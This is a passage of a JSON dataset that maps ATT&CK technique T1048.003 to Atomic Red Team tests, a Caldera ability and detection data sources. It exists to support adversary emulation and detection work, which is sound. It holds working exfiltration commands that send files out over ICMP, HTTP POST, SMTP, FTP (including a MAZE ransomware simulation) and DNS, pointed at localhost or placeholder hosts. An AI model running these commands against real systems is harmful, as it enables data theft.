This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1048.003", + "command_list": [ + "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\\Windows\\System32\\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"127.0.0.1\", 1500, $Data) }\n", + "$content = Get-Content C:\\Windows\\System32\\notepad.exe\nInvoke-WebRequest -Uri #{ip_address} -Method POST -Body $content\n", + "$content = Get-Content #{input_file}\nInvoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments C:\\Windows\\System32\\notepad.exe -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From test@corp.com -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To test@corp.com -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer 127.0.0.1\n", + "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = 
\"ftp://127.0.0.1/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"127.0.0.1\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. Please verify the server address in input args and try again.\"}\n", + null, + "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n", + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = [System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n" + ], + "commands": [ + { + "command": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\\Windows\\System32\\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$ping = New-Object 
System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"127.0.0.1\", 1500, $Data) }\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$content = Get-Content C:\\Windows\\System32\\notepad.exe\nInvoke-WebRequest -Uri #{ip_address} -Method POST -Body $content\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$content = Get-Content #{input_file}\nInvoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments C:\\Windows\\System32\\notepad.exe -SmtpServer #{smtp_server}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From test@corp.com -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From #{sender} -To test@corp.com -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: 
Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer 127.0.0.1\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = \"ftp://127.0.0.1/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"127.0.0.1\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. Please verify the server address in input args and try again.\"}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": null, + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n", + "source": "data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml", + "name": "This ability exfiltrates a compressed archive to an FTP server." 
+ }, + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = [System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n", + "source": "data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml", + "name": "This ability exfiltrates a compressed archive to an FTP server." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1048.003", + "display_name": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol", + "atomic_tests": [ + { + "name": "Exfiltration Over Alternative Protocol - HTTP", + "auto_generated_guid": "1d1abbd6-a3d3-4b2e-bef5-c59293f46eff", + "description": "A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.\n\nUpon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "steps": "1. Victim System Configuration:\n\n mkdir /tmp/victim-staging-area\n echo \"this file will be exfiltrated\" > /tmp/victim-staging-area/victim-file.txt\n\n2. Using Python to establish a one-line HTTP server on victim system:\n\n cd /tmp/victim-staging-area\n python -m SimpleHTTPServer 1337\n\n3. 
To retrieve the data from an adversary system:\n\n wget http://VICTIM_IP:1337/victim-file.txt\n", + "name": "manual" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - ICMP", + "auto_generated_guid": "dd4b4421-2e25-4593-90ae-7021947ad12e", + "description": "Exfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path to file to be exfiltrated.", + "type": "Path", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "ip_address": { + "description": "Destination IP address where the data should be sent.", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "name": "powershell" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - DNS", + "auto_generated_guid": "c403b5a4-b5fc-49f2-b181-d1c80d27db45", + "description": "Exfiltration of specified file over DNS protocol.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "steps": "1. On the adversary machine run the below command.\n\n tshark -f \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run the below commands.\n\n xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done\n \n3. 
Once the data is received, use the below command to recover the data.\n\n cat output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1 | sort | uniq | xxd -p -r\n", + "name": "manual" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - HTTP", + "auto_generated_guid": "6aa58451-1121-4490-a8e9-1dada3f1c68c", + "description": "Exfiltration of specified file over HTTP.\nUpon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$content = Get-Content #{input_file}\nInvoke-WebRequest -Uri #{ip_address} -Method POST -Body $content\n", + "name": "powershell" + }, + "input_arguments": { + "input_file": { + "description": "Path to file to exfiltrate", + "type": "Path", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "ip_address": { + "description": "Destination IP address where the data should be sent", + "type": "String", + "default": "http://127.0.0.1" + } + } + }, + { + "name": "Exfiltration Over Alternative Protocol - SMTP", + "auto_generated_guid": "ec3a835e-adca-4c7c-88d2-853b69c11bb9", + "description": "Exfiltration of specified file over SMTP.\nUpon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. 
Results will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "name": "powershell" + }, + "input_arguments": { + "input_file": { + "description": "Path to file to exfiltrate", + "type": "Path", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "sender": { + "description": "The email address of the sender", + "type": "String", + "default": "test@corp.com" + }, + "receiver": { + "description": "The email address of the receiver", + "type": "String", + "default": "test@corp.com" + }, + "smtp_server": { + "description": "SMTP server to use for email transportation", + "type": "String", + "default": "127.0.0.1" + } + } + }, + { + "name": "MAZE FTP Upload", + "auto_generated_guid": "57799bc2-ad1e-4130-a793-fb0c385130ba", + "description": "This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.\nUpon successful execution, all 7z files within the %windir%\\temp directory will be uploaded to a remote FTP server. 
\nReference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ftp_server": { + "description": "FTP Server address", + "type": "String", + "default": "127.0.0.1" + }, + "username": { + "description": "Username for FTP server login", + "type": "String", + "default": null + }, + "password": { + "description": "Password for FTP server login", + "type": "String", + "default": null + } + }, + "executor": { + "command": "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = \"ftp://#{ftp_server}/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"#{ftp_server}\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. 
Please verify the server address in input args and try again.\"}\n", + "cleanup_command": "$ftp = \"ftp://#{ftp_server}/\"\ntry {foreach ($file in (dir \"$env:windir\\temp\" \"*.7z\"))\n{$uri = New-Object System.Uri($ftp+$file.name)\n $ftp_del = [System.Net.FtpWebRequest]::create($uri)\n $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')\n $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile\n $ftp_del.GetResponse()}} catch{}\n", + "name": "powershell" + } + } + ] + }, + { + "id": "d754878c-17dd-46dc-891c-a993f8a10336", + "name": "Exfil Compressed Archive to FTP Server", + "description": "This ability exfiltrates a compressed archive to an FTP server.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1048.003", + "name": "Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + "platforms": { + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n" + } + }, + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = [System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n" + } + } + }, + "requirements": [ + { + 
"plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
